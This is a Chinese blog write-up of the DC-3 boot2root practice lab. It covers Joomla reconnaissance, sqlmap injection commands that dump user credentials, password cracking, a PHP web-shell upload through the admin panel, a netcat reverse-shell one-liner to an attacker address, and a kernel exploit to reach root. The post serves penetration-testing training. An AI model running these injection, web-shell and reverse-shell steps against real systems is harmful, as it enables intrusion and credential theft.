DC-3复现
DC-3复现
描述
DC-3 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
与之前的 DC 版本一样,这个版本是为初学者设计的,虽然这一次,只有一个标志,一个入口点,根本没有任何线索。
必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文,寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
对于那些有 CTF 和 Boot2Root 挑战经验的人来说,这可能不会花你很长时间(事实上,它可能会花费你不到 20 分钟的时间)。
如果是这种情况,并且如果您希望它更具挑战性,您可以随时重做挑战并探索其他获得根和获得旗帜的方法。
开始
信息收集
- 扫描C段看找到目标机器的ip
- 然后看都开了哪些端口,扫到了80端口
- 直接访问ip看到这个网站用的是joomla的框架,那我们可以尝试利用joomscan工具获取更加详细的信息
因为kali并没有集成该工具,所以需要下载
安装命令
apt install joomscan安装好之后利用工具查看版本等信息
joomscan -u http://192.168.207.142/
- 在报告中不仅仅看到了版本信息,还有后台的管理地址
- 再利用searchploit查找有关的漏洞
- 再用命令查看txt文本
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
- 从中我们得知漏洞的利用方法
渗透开始
sqlmap
- 直接跑payload
1 | sqlmap -u "http://192.168.20.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] |
- 得到了5个数据库,直接查看joomladb数据库中的表
1 | sqlmap -u "http://192.168.207.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering] |
- 查列名
1 | sqlmap -u "http://192.168.207.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering] |
- 查找字段信息
1 | sqlmap -u "http://192.168.207.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "name,password,username" --dump -p list[fullordering] |
john破解
- 得到密码:snoopy
传马
- 然后进入前面找到的后台管理地址,发现该网站可以上传一句话木🐎,那就传,然后用蚁剑连接
- 随便点一个
- 新建一个php文件用来传马
- 找到新建的php文件并写入马的内容,并保存
蚁剑连接
- 打开蚁剑连接
反弹shell
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.207.129 443 >/tmp/f |
漏洞利用
- 用命令uname -a查看内核版本,经过百度对应的是Ubuntu 16.04
- 再次利用searchsploit查找有关Ubuntu 16.04的漏洞
- 打开文件并查看漏洞利用方法
- 下载exp到靶机上,并解压
解压后依次进入39772文件夹
再解压exploit.tar,然后再进入ebpf_mapfd_doubleput_exploit,并运行./compile.sh,然后再运行./doubleput
- 然后在进到root目录,就看到了flag
- 最后再cat一下就得到flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Crzliang!
相关推荐
2022-06-05
DC-1复现
DC-1复现描述 DC-1 是一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 它旨在为初学者带来挑战,但它的简单程度取决于您的技能和知识以及您的学习能力。 要成功完成这一挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。 有多种获得 root 的方法,但是,我已经包含了一些包含初学者线索的标志。 总共有五个标志,但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 即可执行此操作,但是,您将需要 root 权限。 根据您的技能水平,您可能可以跳过查找大多数这些标志并直接获取根。 初学者可能会遇到他们以前从未遇到过的挑战,但谷歌搜索应该是获取完成这一挑战所需信息的全部内容。 开始1.利用nmap收集有用信息 确定DC-1的ip为192.168.207.136 使用命令 nmap -sT...
2022-06-05
DC-4复现
DC-4复现描述 DC-4 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 与之前的 DC 版本不同,这个版本主要是为初学者/中级者设计的。只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。 对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7...
2022-06-05
DC-2复现
DC-2复现描述 与 DC-1 非常相似,DC-2 是另一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验。 与最初的 DC-1 一样,它的设计考虑到了初学者。 必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。 就像 DC-1 一样,有五个标志,包括最终标志。 再说一次,就像 DC-1 一样,标志对初学者很重要,但对有经验的人来说并不那么重要。 简而言之,唯一真正重要的标志是最终标志。 对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等等等。 我还没有探索实现 root...
2022-06-26
DC-5复现
...
2022-10-20
DC-6复现
DC-6复现 描述DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这不是一个过于困难的挑战,因此对初学者来说应该很棒。 这一挑战的最终目标是获得根并阅读唯一的标志。 必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。 对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文,寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。 线索好吧,这并不是一个真正的线索,但对于那些只想继续工作的人来说,更多的是一些“我们不想花五年时间等待某个过程完成”的建议。 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt...
2022-12-01
DC-7复现
DC-7复现描述 DC-7是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 虽然这不是一个过于技术性的挑战,但它并不容易。 虽然这是早期DC版本的逻辑进展(我不会告诉你是哪一个),但涉及一些新概念,但你需要自己弄清楚这些概念。:-)如果您需要诉诸暴力破解或字典攻击,您可能不会成功。 你需要做的,是“跳出框框”思考。 哇 盒子的“外面”。:-) 这个挑战的最终目标是获得根并阅读唯一的标志。 Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。 对于初学者来说,谷歌可以提供很大的帮助,但你总是可以在@DCAU7发推文给我寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。 信息收集确定目标的IP,以及开放的端口 nmap...
评论